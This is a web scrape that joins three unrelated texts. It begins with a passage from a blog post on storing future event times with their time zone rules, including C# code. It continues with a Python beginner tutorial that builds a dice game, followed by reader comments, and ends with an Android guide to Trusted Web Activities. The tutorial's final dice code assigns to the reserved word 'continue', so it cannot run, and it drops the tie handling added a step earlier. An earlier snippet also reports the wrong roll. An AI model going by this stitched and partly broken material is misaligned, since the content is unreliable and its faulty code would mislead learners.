TimeZoneRules: 2019a On March 14th 2020, when the time zone database 2020c is released, this is modified to: - ID: 1 - Name: KindConf - LocalStart: 2022-07-10T09:00:00 - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam - UtcStart: 2022-07-10T08:00:00Z - TimeZoneRules: 2020c Result This is the same as option 2: after the update, there’s a jump of an hour, but when it reaches 0, the conference starts. Implementation This time, we don’t need to convert our old UTC value back to a local value: the “old” time zone rules version and “old” UTC start time are irrelevant. That simplifies matter significantly: public class Conference { public int Id { get; set; } public string Name { get; set; } public string Address { get; set; } public LocalDateTime LocalStart { get; set; } public string TimeZoneId { get; set; } public Instant UtcStart { get; set; } public string TimeZoneRules { get; set; } } // In other code... some parameters might be fields in the class. public void UpdateUtcStart( Conference conference, IDateTimeZoneProvider latestZoneProvider) { DateTimeZone newZone = latestZoneProvider[conference.TimeZoneId]; // Preserve the local time, but with the new time zone rules ZonedDateTime newZonedStart = conference.LocalStart.InZoneLeniently(newZone); // Update the conference entry with the new information conference.UtcStart = newZonedStart.ToInstant(); conference.TimeZoneRules = latestZoneProvider.VersionId; } As the time zone rules version is now optional, this code could be ported to use TimeZoneInfo instead. Obviously from my biased perspective the code wouldn’t be as pleasant, but it would be at least reasonable. The same is probably true on other platforms. So I prefer option 3, but is it really so different from option 2? We’re still storing the UTC value, right? That’s true, but I believe the difference is important because the UTC value is an optimization, effectively. Principle of preserving supplied data For me, the key difference between the options is that in option 3, we store and never change what the conference organizer entered. The organizer told us that the event would start at the given address in Amsterdam, at 9am on July 10th 2022. That’s what we stored, and that information never needs to change (unless the organizer wants to change it, of course). The UTC value is derived from that “golden” information, but can be re-derived if the context changes – such as when time zone rules change. In option 2, we don’t store the original information – we only store derived information (the UTC instant). We need to store information to tell us all the context about how we derived it (the old time zone rules version) and when updating the entry, we need to get back to the original information before we can re-derive the UTC instant using the new rules. If you’re going to need the original information anyway, why not just store that? The implementation ends up being simpler, and it means it doesn’t matter whether or not we even have the old time zone rules. Representation vs information It’s important to note that I’m only talking about preserving the core information that the organizer entered. For the purposes of this example at least, we don’t need to care about the representation they happened to use. Did they enter it as “July 10 2022 09:00” and we then parsed that? Did they use a calendar control that provided us with “2022-07-10T09:00”? I don’t think that’s important, as it’s not part of the core information. It’s often a useful exercise to consider what aspects of the data you’re using are “core” and which are incidental. If you’re receiving data from another system as text for example, you probably don’t want to store the complete XML or JSON, as that choice between XML and JSON isn’t relevant – the same data could be represented by an XML file and a JSON file, and it’s unlikely that anything later will need to know or care. A possible option 4? I’ve omitted a fourth option which could be useful here, which is a mixture of 2 and 3. If you store a “date/time with UTC offset” then you’ve effectively got both the local start time and the UTC instant in a single field. To show the values again, you’d start off with: - ID: 1 - Name: KindConf - Start: 2022-07-10T09:00:00+02:00 - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam - TimeZoneRules: 2019a On March 14th 2020, when the time zone database 2020c is released, this is modified to: - ID: 1 - Name: KindConf - Start: 2022-07-10T09:00:00+01:00 - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam - TimeZoneRules: 2020c In systems that support “date/time with UTC offset” well in both the database and the languages using it, this might be an attractive solution. It’s important to note that the time zone ID is still required (unless you derive it from the address whenever you need it) – there’s a huge difference between knowing the time zone that’s applied, and knowing the UTC offset in one specific situation. Personally I’m not sure I’m a big fan of this option, as it combines original and derived data in a single field – the local part is the original data, and the offset is derived. I like the separation between original and derived data in option 3. With all those options presented, let’s look at a few of the corner cases I’ve mentioned in the course of the post. Ambiguous and skipped times In both of the implementations I’ve shown, I’ve used the InZoneLeniently method from Noda Time. While the mapping from UTC instant to local time is always completely unambiguous for a single time zone, the reverse mapping (from local time to UTC instant) is not always unambiguous. As an example, let’s take the Europe/London time zone. On March 31st 2019, at 1am local time, we will “spring forward” to 2am, changing offset from UTC+0 to UTC+1. On October 27th 2019, at 2am local time, we will “fall back” to 1am, changing offset from UTC+1 to UTC+0. That means that 2019-03-31T01:30 does not happen at all in the Europe/London time zone, and 2019-10-27T01:30 occurs twice. Now it’s reasonable to validate this when a conference organizer specifies the starting time of a conference, either prohibiting it if the given time is skipped, or asking for more information if the given time is ambiguous. I should point out that this is highly unlikely for a conference, as transitions are generally done in the middle of the night – but other scenarios (e.g. when to schedule an automated backup) may well fall into this. That’s fine at the point of the first registration, but it’s also possible that a previously-unambiguous local time could become ambiguous under new time zone rules. InZoneLeniently handles that in a way documented in the Resolvers.LenientResolver. That may well not be the appropriate choice for any given application, and developers should consider it carefully, and write tests. Recurrent events The example I’ve given so far is for a single event. Recurrent events – such as weekly meetings – end up being trickier still, as a change to time zone rules can change the offsets for some instances but not others. Likewise meetings may well be attended by people from more than a single time zone – so it’s vital that the recurrence would have a single coordinating time zone, but offsets may need to be recomputed for every time zone involved, and for every occurrence. Application developers have to think about how this can be achieved within performance requirements. Time zone boundary changes and splits So far we’ve only considered time zone rules changing. In options 2-4, we stored a time zone ID within the entry. That assumes that the time zone associated with the event will not change over time. That assumption may not be valid. As far as I’m aware, time zone rules change more often than changes to which time zone any given location is in – but it’s entirely possible for things to change over time. Suppose the conference wasn’t in Amsterdam itself, but Rotterdam. Currently Rotterdam uses the Europe/Amsterdam time zone, but what if the Netherlands splits into two countries between 2019 and 2022? It’s feasible that by the time the conference occurs, there could be a Europe/Rotterdam time zone, or something equivalent. To that end, a truly diligent application developer might treat the time zone ID as derived data based on the address of the conference. As part of checking each entry when the time zone database is updated, they might want to find the time zone ID of the address of the conference, in case that’s changed. There are multiple services that provide this information, although it may need to be a multi-step process, first converting the address into a latitude/longitude position, and then finding the time zone for that latitude/longitude. Past vs recent past This post has all been about future date/time values. In Twitter threads discussing time zone rule changes, there’s been a general assertion that it’s safe to only store the UTC instant related to an event in the past. I would broadly agree with that, but with one big caveat: as I mentioned earlier, sometimes governments adopt time zone rule changes with almost no notice at all. Additionally, there can be a significant delay between the changes being published and them being available within applications. (That delay can vary massively based on your platform.) This means that while a conversion to UTC for a value more than (say) a year ago will probably stay valid, if you’re recording a date and time of “yesterday”, it’s quite possible that you’re using incorrect rules without knowing it. (Even very old rules can change, but that’s rarer in my experience.) Do you need to account for this? That depends on your application, like so many other things. I’d at least consider the principle described above – and unless it’s much harder for you to maintain the real source information for some reason, I’d default to doing that. Conclusion The general advice of “just convert all local date/time data to UTC and store that” is overly broad in my view. For future and near-past events, it doesn’t take into account that time zone rules change, making the initial conversion potentially inaccurate. Part of the point of writing this blog post is to raise awareness, so that even if people do still recommend storing UTC, they can add appropriate caveats rather than treating it as a universal silver bullet. I should explicitly bring up timestamps at this point. Machine-generated timestamps are naturally instants in time, recording “the instant at which something occurred” in an unambiguous way. Storing those in UTC is entirely reasonable – potentially with an offset or time zone if the location at which the timestamp was generated is relevant. Note that in this case the source of the data isn’t “a local time to be converted”. That’s the bigger point, that goes beyond dates and times and time zones: choosing what information to store, and how. Any time you discard information, that should be a conscious choice. Are you happy discarding the input format that was used to enter a date? Probably – but it’s still a decision to make. Defaulting to “convert to UTC” is a default to discarding information which in some cases is valid, but not all. Make it a conscious choice, and ensure you store all the information you think may be needed later. You might also want to consider whether and how you separate “source” information from “derived” information – this is particularly relevant when it comes to archiving, when you may want to discard all the derived data to save space. That’s much easier to do if you’re already very aware of which data is derived. My experience is that developers either don’t think about date/time details nearly enough when coding, or are aware of some of the pitfalls but decide that means it’s just too hard to contemplate. Hopefully this worked example of real life complexity shows that it can be done: it takes a certain amount of conscious thought, but it’s not rocket science. 75 1 person.
https://codeblog.jonskeet.uk/2019/03/27/storing-utc-is-not-a-silver-bullet/?like_comment=47292&_wpnonce=7be0617328&replytocom=46199
CC-MAIN-2019-43
refinedweb
4,078
57.4
Get the highlights in your inbox every week. Getting started with Python programming Learn how to program in Python by building a simple dice game Python is a good language for young and old, with or without any programming experience. Subscribe now Python is an all-purpose programming language that can be used to create desktop applications, 3D graphics, video games, and even websites. It's a great first programming language because it can be easy to learn and it's simpler than complex languages like C, C++, or Java. Even so, Python is powerful and robust enough to create advanced applications, and it's used in just about every industry that uses computers. This makes Python a good language for young and old, with or without any programming experience. Installing Python Before learning Python, you may need to install it. Linux: If you use Linux, Python is already included, but make sure that you have Python 3 specifically. To check which version is installed, open a terminal window and type: python --version Should that reveal that you have version 2 installed, or no version at all, try specifying Python 3 instead: python3 --version If that command is not found, then you must install Python 3 from your package manager or software center. Which package manager your Linux distribution uses depends on the distribution. The most common are dnf on Fedora and apt on Ubuntu. For instance, on Fedora, you type this: sudo dnf install python3 MacOS: If you're on a Mac, follow the instructions for Linux to see if you have Python 3 installed. MacOS does not have a built-in package manager, so if Python 3 is not found, install it from python.org/downloads/mac-osx. Although your version of macOS may already have Python 2 installed, you should learn Python 3. Windows: Microsoft Windows doesn't currently ship with Python. Install it from python.org/downloads/windows. Be sure to select Add Python to PATH in the install wizard. Read my article How to Install Python on Windows for instructions specific to Microsoft Windows. Running an IDE To write programs in Python, all you really need is a text editor, but it's convenient to have an integrated development environment (IDE). An IDE integrates a text editor with some friendly and helpful Python features. IDLE 3 and PyCharm (Community Edition) are two options among many to consider. IDLE 3 Python comes with a basic IDE called IDLE. It has keyword highlighting to help detect typing errors, hints for code completion, and a Run button to test code quickly and easily. To use it: - On Linux or macOS, launch a terminal window and type idle3. - On Windows, launch Python 3 from the Start menu. - If you don't see Python in the Start menu, launch the Windows command prompt by typing cmd in the Start menu, and type C:\Windows\py.exe. - If that doesn't work, try reinstalling Python. Be sure to select Add Python to PATH in the install wizard. Refer to docs.python.org/3/using/windows.html for detailed instructions. - If that still doesn't work, just use Linux. It's free and, as long as you save your Python files to a USB thumb drive, you don't even have to install it to use it. PyCharm Community Edition PyCharm (Community Edition) IDE is an excellent open source Python IDE. It has keyword highlighting to help detect typos, quotation and parenthesis completion to avoid syntax errors, line numbers (helpful when debugging), indentation markers, and a Run button to test code quickly and easily. To use it: - Install PyCharm (Community Edition) IDE. On Linux, it's easiest to install it with Flatpak. Alternatively, download the correct installer version from PyCharm's website and install it manually. On MacOS or Windows, download and run the installer from the PyCharm website. - Launch PyCharm. - Create a new project. Telling Python what to do Keywords tell Python what you want it to do. In your new project file, type this into your IDE: print("Hello world.") - If you are using IDLE, go to the Run menu and select Run module option. - If you are using PyCharm, click the Run File button in the left button bar. pycharm-button-run.jpeg opensource.com The keyword print tells Python to print out whatever text you give it in parentheses and quotes. That's not very exciting, though. At its core, Python has access to only basic keywords, like print, help, basic math functions, and so on. You can use the import keyword to load more keywords. Using the turtle module in Python Turtle is a fun module to use. Type this code into your file (replacing the old code), and then run it: import turtle? Advanced turtle You can try some more complex code for similar results. Instead of hand-coding every line and every turn, you can use a while loop, telling Python to do this four times: draw a line and then turn. Python is able to keep track of how many times it's performed these actions with a variable called counter. You'll learn more about variables soon, but for now see if you can tell how the counter and while loop interact. import turtle as t import time t.color("blue") t.begin_fill() counter=0 while counter < 4: t.forward(100) t.left(90) counter = counter+1 t.end_fill() time.sleep(2) Once you have run your script, it's time to explore an even better module. Learning Python by making a game To learn more about how Python works and prepare for more advanced programming with graphics, let's focus on game logic. In this tutorial, we'll also learn a bit about how computer programs are structured by making a text-based game in which the computer and the player roll a virtual die, and the one with the highest roll wins. Planning your game Before writing code, it's important to think about what you intend to write. Many programmers write simple documentation before they begin writing code, so they have a goal to program toward. Here's how the dice program might look if you shipped documentation along with the game: - Start the dice game and press Return or Enter to roll. - The results are printed out to your screen. - You are prompted to roll again or to quit. It's a simple game, but the documentation tells you a lot about what you need to do. For example, it tells you that you need the following components to write this game: - Player: You need a human to play the game. - AI: The computer must roll a die, too, or else the player has no one to win or lose to. - Random number: A common six-sided die renders a random number between 1 and 6. - Operator: Simple math can compare one number to another to see which is higher. - A win or lose message. - A prompt to play again or quit. Making dice game alpha Few project called dice_alpha:. Improving the game In this second version (called a beta) of your game, a few improvements will make it feel more like a game. 1. Describe the results Instead of just telling players whether they did or didn't win, it's more interesting if they know what they rolled. Try making these changes to your code: player = random.randint(1,6) print("You rolled " + player) ai = random.randint(1,6) print("The computer rolled " + ai) If you run the game now, it will crash because Python thinks you're trying to do math. It thinks you're trying to add the letters "You rolled" and whatever number is currently stored in the player variable. You must tell Python to treat the numbers in the player and ai variables as if they were a word in a sentence (a string) rather than a number in a math equation (an integer). Make these changes to your code: player = random.randint(1,6) print("You rolled " + str(player) ) ai = random.randint(1,6) print("The computer rolled " + str(ai) ) Run your game now to see the result. 2. Slow it down Computers are fast. Humans sometimes can be fast, but in games, it's often better to build suspense. You can use Python's time function to slow your game down during the suspenseful parts. import random import time player = random.randint(1,6) print("You rolled " + str(player) ) ai = random.randint(1,6) print("The computer rolls...." ) time.sleep(2) print("The computer has rolled a " + str(player) ) if player > ai : print("You win") # notice indentation else: print("You lose") Launch your game to test your changes. 3. Detect ties If you play your game enough, you'll discover that even though your game appears to be working correctly, it actually has a bug in it: It doesn't know what to do when the player and the computer roll the same number. To check whether a value is equal to another value, Python uses ==. That's two equal signs, not just one. If you use only one, Python thinks you're trying to create a new variable, but you're actually trying to do math. When you want to have more than just two options (i.e., win or lose), you can using Python's keyword elif, which means else if. This allows your code to check to see whether any one of some results are true, rather than just checking whether one thing is true. Modify your code like this: if player > ai : print("You win") # notice indentation elif player == ai: print("Tie game.") else: print("You lose") Launch your game a few times to try to tie the computer's roll. Programming the final release The beta release of your dice game is functional and feels more like a game than the alpha. For the final release, create your first Python function. A function is a collection of code that you can call upon as a distinct unit. Functions are important because most applications have a lot of code in them, but not all of that code has to run at once. Functions make it possible to start an application and control what happens and when. Change your code to this: import random import time def dice(): player = random.randint(1,6) print("You rolled " + str(player) ) ai = random.randint(1,6) print("The computer rolls...." ) time.sleep(2) print("The computer has rolled a " + str(ai) ) if player > ai : print("You win") # notice indentation else: print("You lose") print("Quit? Y/N") continue = input() if continue == "Y" or continue == "y": exit() elif continue == "N" or continue == "n": pass else: print("I did not understand that. Playing again.") This version of the game asks the player whether they want to quit the game after they play. If they respond with a Y or y, Python's exit function is called and the game quits. More importantly, you've created your own function called dice. The dice function doesn't run right away. In fact, if you try your game at this stage, it won't crash, but it doesn't exactly run, either. To make the dice function actually do something, you have to call it in your code. Add this loop to the bottom of your existing code. The first two lines are only for context and to emphasize what gets indented and what does not. Pay close attention to indentation. else: print("I did not understand that. Playing again.") # main loop while True: print("Press return to roll your die.") roll = input() dice() The while True code block runs first. Because True is always true by definition, this code block always runs until Python tells it to quit. The while True code block is a loop. It first prompts the user to start the game, then it calls your dice function. That's how the game starts. When the dice function is over, your loop either runs again or it exits, depending on how the player answered the prompt. Using a loop to run a program is the most common way to code an application. The loop ensures that the application stays open long enough for the computer user to use functions within the application. Next steps Now you know the basics of Python programming. The next article in this series describes how to write a video game with PyGame, a module that has more features than turtle, but is also a lot more complex. This article was originally published in October 2017 and has been updated by the author. 18 Comments, Register or Log in to post a comment. Looking forward to read whole series. Thanks for reading! Python's a really neat language, and I enjoy teaching it (enforced whitespace notwithstanding). Thank you Seth. Am reading the “Think Python” book and it all starts making since now. Can’t wait for the next article Immersion helps a lot. The other thing that helps is having a project. Even if it's something simple, or silly like a game, you really get to know a language by trying to make it do something specific. Thanks for reading my article! That is such an important point Seth, One does learn faster if one has a project they want to do. I learned Java trying to make a screen sharer, desktop environment, and password manager. I am not great at programming per say, yet, but I have learned advanced concepts such as inheritance, threading, and server/client socketing because of specific projects I wanted to do and the usefulness of such concepts. This is such a great article Seth! I'm sharing it with my Python coding class today. Thanks for sharing your expertise. Great! There's more to come! For me, I find a very efficient way to work on syntax is python on the command line. Just type 'python', and you're in a running python console, which saves values so that you can enter sequential commands. Type 'Ctrl-D' to exit. This is good for testing code, but for iteration I find it less helpful. Students usually need to revise and build upon their code, and that's a bit difficult to do when you're working in the terminal version of IDLE. I'm looking forward to PyGame! I've played around with it and found its many features a little bewildering. I plan on covering it over the course of about 10 more articles, so it'll be a journey - but it'll be worth it, I promise! Something else I was thinking of is that it's never too early to think about documentation, in this case comments in the code, which are mostly needed by yourself when you haven't looked at the program for 6 months to a year. So true. Someone said to me recently "code is read more often than it is written". So the readability of code, comments being the prose side of that, is really really important! Great article. Dice are actually a great starting point to get familiar with something simple in python. My first personal project in python was a dicewarebot for mastodon (). Same idea with a little more complexity, but it's basically just rolling dice. That sounds great! I'm on mastodon, so I'll check it out! I think there's a lot to be said for challenging new programmers (or ourselves) with randomness challenges. It's one thing to fall back on /dev/random or rand.range() but it's quite another to try to invent other sources of random data from which we can generate our dice roll results. When I teach a dice app to people, I sometimes don't tell them about /dev/random. I give them other tools, like the math operators, time stamps, and other things like that, so they can try to invent randomness. It's a great mental and programming exercise. simple and sweet looking forward for more advanced games using python " " print("The computer has rolled a " + str(player) ) " " This line should be corrected to print("The computer has rolled a " + str(ai) ) print("The computer has rolled a " + str(player) ) Should be str(ai)
https://opensource.com/article/17/10/python-101
CC-MAIN-2021-43
refinedweb
2,725
73.17
Last Element Remaining by Deleting the Two Largest Elements and Replacing them with Their Absolute Difference If They are Unequal Introduction Interviews after Interviews,, we see questions related to priority queue being asked. So having a good grip over the priority queue surely gives us an upper hand over the rest of the competition. But you don’t need to worry about any of it because Ninjas are here with you. Today we will see one such question named ‘Last element remaining by deleting the two largest elements and replacing them with their absolute difference if they are unequal’. Now let’s see the problem statement in detail. Understanding the Problem We have been given an array, and our task is to pick the two largest elements in the array and remove them. Now, if these elements are unequal, we will insert the absolute difference of the elements into the array. We will keep performing this until the array has 1 or no elements left in it. If there is only one element left in the array, then we will print that. Otherwise, we will print ‘-1’. Let’s understand the problem better by the following example. ARR = {1, 2, 3, 4} Explanation Let’s understand this step by step: - Initially, 3 and 4 are the two largest elements in the array, so we will take them out, and also, as they are not equal, we will insert their absolute difference (4 - 3) in the array. So now array becomes {1, 2, 1} - Now, 1, 2 are the two largest elements. They are not equal. Thus, we will insert their absolute difference (2 - 1) in the array. So now the array becomes {1, 1}. - Now, 1, 1 are the two largest elements of the array. Now, both of them are equal. Thus, we did not insert anything in the array. - Now the size of the array becomes 0. Thus, we will print -1. Intuition As we have to regularly maintain the sorted array and have to pick the top two largest elements from it. The direction in which our mind first goes is towards the Priority queue. The idea here is to use a max priority queue. We will first insert all the elements in the priority queue. Then we will keep performing the following operations till the size of the queue becomes 1 or 0: - Take two elements at the top of the queue. Pop them. - If they are not equal, then we will insert their absolute difference. Else, we will continue. Now, if the size of the queue is 0, we will print ‘-1’. Else if its size is one, then we will print that single element present in the queue. Things will become much clearer from the code. Code #include <iostream> #include <vector> #include <queue> using namespace std; // Function to reduce the array and print the remaining element. int reduceArray(vector<int> &arr) { priority_queue<int> maxPq; // Inserting elements of array in priority_queue. for (int i = 0; i < arr.size(); i++) maxPq.push(arr[i]); // Looping through elements. while (maxPq.size() > 1) { // Remove largest element. int maxEle = maxPq.top(); maxPq.pop(); // Remove 2nd largest element. int secondMaxEle = maxPq.top(); maxPq.pop(); // If these are not equal. if (maxEle != secondMaxEle) { // Pushing into queue. maxPq.push((maxEle - secondMaxEle)); } } // If only one element is there in the heap. if (maxPq.size() == 1) cout << maxPq.top(); else cout << "-1"; } int main() { // Taking user input. int n; cin >> n; vector<int> arr(n, 0); for (int i = 0; i < n; i++) cin >> arr[i]; // Calling function 'reduceArray()'. reduceArray(arr); return 0; } Input 4 1 2 3 4 Output -1 Time Complexity O(N * log N), where ‘N’ is the length of the array. As we are inserting ‘N’ elements in the priority queue and each insertion costs us O(log N) time thus ‘N’ insertions will cost O(N * log N). After insertion we are just looping through all the elements in the queue that will cost us O(N) time. Thus the overall complexity is O(N) + O(N * log N) ~ O(N * log N). Space Complexity O(N), where ‘N’ is the length of the array. As we are using a priority queue to store the elements in the queue and as there are ‘N’ elements, extra space of O(N) will be required. Key Takeaways We saw how we could solve the problem, ‘last element remaining by deleting the two largest elements and replacing them with their absolute difference if they are unequal’ with the help of a priority queue. We first inserted all the elements in the queue and then, according to the question popped the top two elements. For more such interesting questions, move over to our industry-leading practice platform CodeStudio to practice top problems and many more. Till then, Happy Coding!
https://www.codingninjas.com/codestudio/library/last-element-remaining-by-deleting-the-two-largest-elements-and-replacing-them-with-their-absolute-difference-if-they-are-unequal
CC-MAIN-2022-27
refinedweb
805
65.93
I'm in the process of researching and setting up Distributed File System (DFS) in our environment. From all the articles I've read, I've decided that I want to install the namespace server on the Domain Controller. Here's my question(s). We have two domain controllers so that we have AD redundancy (in case on is down). If I install DFS-N on both of the domain controllers, will they automatically provide DFS Root redundancy for each other? In all the articles I've read, I'm still not clear if I should have two DFS root namespace servers and if so, if they automatically provide root redundancy. If not, can it be setup manually, and how? My current thinking is that I should install DFS-N on both domain controllers for redundancy. I just need some expert direction. Thanks. We're running Windows Server 2008 R2, is running at 2003 Domain and Forest functional Level. We're small and all our servers are in the same LAN. \\ad.example.comwill show the DFS root if they are on the DCs. Otherwise you have to go to \\ad.example.com\rootfolder. Not really a big deal at all. We don't have our DC's as namespace servers but if you only had two it wouldn't be a big deal.
https://serverfault.com/questions/609111/does-installing-dfs-n-on-two-domain-controllers-provide-dfs-root-redundancy
CC-MAIN-2021-49
refinedweb
224
74.49
Last updated: June 7th, 2019 Trusted Web Activities are a new way to integrate your web-app content such as your PWA with your Android app using a protocol based on Custom Tabs. Looking for the code? There are a few things that make Trusted Web Activities different from other ways to integrate web content with your app: - Content in a Trusted Web activity is trusted -- the app and the site it opens are expected to come from the same developer. (This is verified using Digital Asset Links.) - Trusted Web activities come, custom HTTP headers,. Getting started Setting up a Trusted Web Activity (TWA) doesn’t require developers to author Java code, but Android Studio is required. This guide was created using Android Studio 3.3. Check the docs on how to install it. Create a Trusted Web Activity Project When using Trusted Web Activities, the project must target API 16 or higher. Open Android Studio and click on Start a new Android Studio project. Android Studio will prompt to choose an Activity type. Since TWAs use an Activity provided by support library, choose Add No Activity and click Next. Next step, the wizard will prompt for configurations for the project. Here's a short description of each field: - Name: The name that will be used for your application on the Android Launcher. - Package Name: An unique identifier for Android Applications on the Play Store and on Android devices. Check the documentation for more information on requirements and best practices for creating package names for Android apps. - Save location: Where Android Studio will create the project in the file system. - Language: The project doesn't require writing any Java or Kotlin code. Select Java, as the default. - Minimum API Level: The Support Library requires at least API Level 16. Select API 16 any version above. Leave the remaining checkboxes unchecked, as we will not be using Instant Apps or AndroidX artifacts, and click Finish. Get the TWA Support Library To setup the TWA library in the project you will need to edit a couple of files. Look for the Gradle Scripts section in the Project Navigator. Both files are called build.gradle, which may be a bit confusing, but the descriptions in parenthesis help identifying the correct one. The first file is the Project level build.gradle. Look for the one with your project name next to it. Add the Jitpack configuration (in bold below) to the list of repositories. Under the allprojects section: allprojects { repositories { google() jcenter() maven { url "" } } } Android Studio will prompt to synchronize the project. Click on the Sync Now link. The second file we need to change is the Module level build.gradle. The Trusted Web Activities library uses Java 8 features and the first change enables Java 8. Add a compileOptions section to the bottom of the android section, as below: android { ... compileOptions { sourceCompatibility JavaVersion.VERSION_1_8 targetCompatibility JavaVersion.VERSION_1_8 } } The next step will add the TWA Support Library to the project. Add a new dependency to the dependencies section: dependencies { implementation 'com.github.GoogleChrome.custom-tabs-client:customtabs:7a2c1374a3' } Android Studio will show prompt asking to synchronize the project once more. Click on the Sync Now link and synchronize it. Add the TWA Activity Setting up the TWA Activity is achieved by editing the Android App Manifest. On the Project Navigator, expand the app section, followed by the manifests and double click on AndroidManifest.xml to open the file. Since we asked Android Studio not to add any Activity to our project when creating it, the manifest is empty and contains only the application tag. Add the TWA Activity by inserting an activity tag into the application tag: <manifest xmlns: <application android: <activity android: <!-- Edit android:value to change the url opened by the TWA --> <meta-data android: <!-- This intent-filter adds the TWA to the Android Launcher --> <intent-filter> <action android: <category android: </intent-filter> <!-- This intent-filter allows the TWA to handle Intents to open airhorner.com. --> <intent-filter> <action android: <category android: <category android: <!-- Edit android:host to handle links to the target URL--> <data android: </intent-filter> </activity> </application> </manifest> The tags added to the XML are standard Android App Manifest. There are two relevant pieces of information for the context of Trusted Web Activities: - The meta-datatag tells the TWA Activity which URL it should open. Change the android:valueattribute with the URL of the PWA you want to open. In this example, it is. - The second intent-filtertag allows the TWA to intercept Android Intents that open. The android:hostattribute inside the datatag must point to the domain being opened by the TWA. The next section will show how to setup Digital AssetLinks to verify relationship between the website and the app, and remove the URL bar. Remove the URL bar Trusted Web Activities require an association between the Android application and the website to be established to remove the URL bar. This association is created via Digital Asset Links and the association must be established in both ways, linking from the app to the website and from the website to the app. It is possible to setup the app to website validation and setup Chrome to skip the website to app validation, for debugging purposes. Establish an association from app to the website Open the string resources file app > res > values > strings.xml and add the Digital AssetLinks statement below: <resources> <string name="app_name">AirHorner TWA</string> <string name="asset_statements"> [{ \"relation\": [\"delegate_permission/common.handle_all_urls\"], \"target\": { \"namespace\": \"web\", \"site\": \"\"} }] </string> </resources> Change the contents for the site attribute to match the schema and domain opened by the TWA. Back in the Android App Manifest file, AndroidManifest.xml, link to the statement by adding a new meta-data tag, but this time as a child of the application tag: <manifest xmlns: <application android: <meta-data android: <activity> ... </activity> </application> </manifest> We have now established a relationship from the Android application to the website. It is helpful to debug this part of the relationship without creating the website to application validation. Here’s how to test this on a development device: Enable debug mode - Open Chrome on the development device, navigate to chrome://flags, search for an item called Enable command line on non-rooted devices and change it to ENABLED and then restart the browser. - Next, on the Terminal application of your operating system, use the Android Debug Bridge (installed with Android Studio), and run the following command: adb shell "echo '_ --disable-digital-asset-link-verification-for-url=\"\"' > /data/local/tmp/chrome-command-line" Close Chrome and re-launch your application from Android Studio. The application should now be shown in full-screen. Establish an association from the website to the app There are 2 pieces of information that the developer needs to collect from the app in order to create the association: - Package Name: The first information is the package name for the app. This is the same package name generated when creating the app. It can also be found inside the Module build.gradle, under Gradle Scripts > build.gradle (Module: app), and is the value of the applicationIdattribute. - SHA-256 Fingerprint: Android applications must be signed in order to be uploaded to the Play Store. The same signature is used to establish the connection between the website and the app through the SHA-256 fingerprint of the upload key. The Android documentation explains in detail how to generate a key using Android Studio. Make sure to take note the path, alias and passwords for the key store, as you will need it for the next step. Extract the SHA-256 fingerprint using the keytool, with the following command: keytool -list -v -keystore -alias -storepass -keypass The value for the SHA-256 fingerprint is printed under the Certificate fingerprints section. Here’s an example output: keytool -list -v -keystore ./mykeystore.ks -alias test -storepass password -keypass passwordAlias name: key0 Creation date: 28 Jan 2019 Entry type: PrivateKeyEntry Certificate chain length: 1 Certificate[1]: Owner: CN=Test Test, OU=Test, O=Test, L=London, ST=London, C=GB Issuer: CN=Test Test, OU=Test, O=Test, L=London, ST=London, C=GB Serial number: ea67d3d Valid from: Mon Jan 28 14:58:00 GMT 2019 until: Fri Jan 22 14:58:00 GMT 2044 Certificate fingerprints: SHA1: 38:03:D6:95:91:7C:9C:EE:4A:A0:58:43:A7:43:A5:D2:76:52:EF:9B SHA256: F5:08:9F:8A:D4:C8:4A:15:6D:0A:B1:3F:61:96:BE:C7:87:8C:DE:05:59:92:B2:A3:2D:05:05:A5:62:A5:2F:34 Signature algorithm name: SHA256withRSA Subject Public Key Algorithm: 2048-bit RSA key Version: 3 With both pieces of information at hand, head over to the assetlinks generator, fill-in the fields and hit Generate Statement. Copy the generated statement and serve it from your domain, from the URL /.well-known/assetlinks.json. Creating an Icon When Android Studio creates a new project, it will come with a default Icon. As a developer, you will want to create your own icon and differentiate your application from others on the Android Launcher. Android Studio contains the Image Asset Studio, which provides the tools necessary to create the correct icons, for every resolution and shape your application needs. Inside Android Studio, navigate to File > New > Image Asset, select Launcher Icons (Adaptative and Legacy) and follow the steps from the Wizard. to create a custom icon for the application. Generating a signed APK With the assetlinks file in place in your domain and the asset_statements tag configured in the Android application, the next step is generating a signed app. Again, the steps for this are widely documented. The output APK can be installed into a test device, using adb: adb install app-release.apk If the verification step fails it is possible to check for error messages using the Android Debug Bridge, from your OS’s terminal and with the test device connected. adb logcat | grep -e OriginVerifier -e digital_asset_links With the upload APK generated, you can now upload the app to the Play Store. Adding a Splash Screen Starting on Chrome 75, Trusted Web Activities have support for Splash Screens. The Splash Screen can be set up by adding a few new image files and configurations to the project. Make sure to update to Chrome 75 or above and use the latest version of TWA Support Library. Generating the images for the Splash Screen Android devices can have different screen sizes and pixel densities. To ensure the Splash Screen looks good on all devices, you will need to generate the image for each pixel density. A full explanation of display-independent pixels (dp or dip) is beyond the scope of this article, but one example would be to create an image that is 320x320dp, which represents a square of 2x2 inches on a device screen of any density and is equivalent to 320x320 pixels at the mdpi density. From there we can derive the sizes needed for other pixel densities. Below is a list with the pixel densities, the multiplier applied to the base size (320x320dp), the resulting size in pixels and the location where the image should be added in the Android Studio project. Updating the application With the images for the splash screen generated, it's time to add the necessary configurations to the project. First, add a content-provider to the Android Manifest ( AndroidManifest.xml). <application> ... <provider android: <meta-data android: </provider> </application> Then, add res/xml/filepaths.xml resource, and specify the path to the twa splash screen: <paths> <files-path </paths> Finally, add meta-tags to the Android Manifest to customize the LauncherActivity: <activity android: ... <meta-data android: <meta-data android: <meta-data android: <meta-data android: ... </activity> Ensure that the value of the android.support.customtabs.trusted.FILE_PROVIDER_AUTHORITY tag matches the value defined of the android:authorities attribute inside the provider tag. Making the LauncherActivity transparent Additionally, make sure the LauncherActivity is transparent to avoid a white screen showing before the splash. Add a new theme to res/styles.xml: <style name="Theme.LauncherActivity" parent="Theme.AppCompat.NoActionBar"> <item name="android:windowAnimationStyle">@null</item> <item name="android:windowIsTranslucent">true</item> <item name="android:windowNoTitle">true</item> <item name="android:windowBackground">@android:color/transparent</item> <item name="android:backgroundDimEnabled">false</item> </style> Then, add a reference to the new style in the Android Manifest: <application> ... <activity android: ... </activity> </application> We are looking forward to see what developers build with Trusted Web Activities. To drop any feedback, reach out to us at @ChromiumDev. RSS or Atom feed and get the latest updates 